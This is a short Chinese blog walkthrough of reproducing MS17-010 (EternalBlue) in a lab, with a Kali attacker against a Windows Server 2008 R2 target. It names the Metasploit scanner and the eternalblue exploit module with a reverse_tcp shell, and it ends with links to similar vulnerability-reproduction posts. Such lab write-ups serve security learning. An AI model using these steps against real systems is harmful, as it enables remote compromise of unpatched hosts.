MS17-010复现

柔光的暖阳◎ 2023-06-01 05:50 11阅读 0赞

0x00 环境：

1. 攻击机 kali ip: 192.168.48.142

2. 靶机win2008 r2 x64 ip: 192.168.48.145

0x01 确定目标之后，对目标进行端口扫描。

![1722441-20190919185423284-1572098960.png][]

0x02 使用msf的ms17-010进行攻击

![1722441-20190919185524698-844362354.png][]

2.使用`use auxiliary/scanner/smb/smb_ms17_010`进行检测

![1722441-20190919185654987-147915412.png][]

图中方框是的确存在漏洞

3.使用`exploit/windows/smb/ms17_010_eternalblue`模块进行攻击(reverse\_tcp反向)

![1722441-20190919185809590-571267171.png][]

得到shell

![1722441-20190919185837119-207100611.png][]

转载于:https://www.cnblogs.com/kuaile1314/p/11551774.html

[1722441-20190919185423284-1572098960.png]: /images/20230601/538912c62bbc496bb6c4d651b213d7d8.png
[1722441-20190919185524698-844362354.png]: /images/20230601/1b4ec14946f8480da93485e917b9ceb4.png
[1722441-20190919185654987-147915412.png]: /images/20230601/0ace3fb5cad340adb9eaf777d860d790.png
[1722441-20190919185809590-571267171.png]: /images/20230601/6b8f57f6a3f34002a0fc13b965bcb6e6.png
[1722441-20190919185837119-207100611.png]: /images/20230601/06bf4b05b98d4230acd51d15d11a487b.png

发表评论取消回复

表情：

评论列表（有 0 条评论，11人围观）

还没有评论，来说两句吧...

相关阅读

相关 cve-2022-26923复现——域提权漏洞复现

cve-2022-26923域提权漏洞复现

秒速五厘米/ 2024年05月23日 14:15/ 0 赞/ 92 阅读

相关 MSF复现MS17-010漏洞（永恒之蓝）

MS17-010漏洞复现复现环境攻击机:kali 靶机:windows 7 使用工具：Metasploit Metasploit简介 Metasploit

雨点打透心脏的1/2处/ 2023年10月07日 23:06/ 0 赞/ 34 阅读

相关 Thinkphp漏洞复现

Thinkphp简介 Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是

逃离我推掉我的手/ 2023年10月07日 22:07/ 0 赞/ 41 阅读

相关 Tomcat漏洞复现

目录一、Tomcat任意文件读写漏洞（CVE-2017-12615） 1、漏洞描述 2、影响范围 3、漏洞分析

青旅半醒/ 2023年10月06日 21:12/ 0 赞/ 97 阅读

相关 Fastjson漏洞复现

目录简介 CVE-2017-18349（Fastjson v1.2.24远程命令执行）漏洞简介漏洞环境漏洞复现

不念不忘少年蓝@/ 2023年10月06日 19:36/ 0 赞/ 85 阅读

相关 MS17-010复现

0x00 环境：　　1. 攻击机 kali ip: 192.168.48.142 　　2. 靶机win2008 r2 x64 ip: 192.168.48.145 0x

柔光的暖阳◎/ 2023年06月01日 05:50/ 0 赞/ 12 阅读

相关 fastjson 漏洞复现

可能从fastjson“盘古开天地”开始讲，因为我对序列化反序列化还有那些组件非常不熟悉（谁不搞开发会对这些熟悉）也算复习一下java知识吧，之前好像我自己大二学习java序

系统管理员/ 2023年02月24日 15:23/ 0 赞/ 30 阅读

相关【图像检索】research-ms-loss复现

代码参考：[https://github.com/msight-tech/research-ms-loss][https_github.com_msight-tech_rese

骑猪看日落/ 2023年01月22日 04:00/ 0 赞/ 153 阅读

相关内存溢出复现

开发与生产环境经常会遇到内存溢出的错误感觉都差不多，其实 JVM 每个内存区域发生 OOM 的原因还是差异的。 JVM 的内存区域中，一般只有程序计数器这个区域不会发生内存

妖狐艹你老母/ 2023年01月03日 04:08/ 0 赞/ 214 阅读

相关 XSS漏洞复现

XSS漏洞复现实验环境DVWA > XSS(cross site script) 跨站脚本。属于代码执行的一种，这里执行的是前端代码，一般是javascript代码。

迷南。/ 2021年09月21日 05:16/ 0 赞/ 546 阅读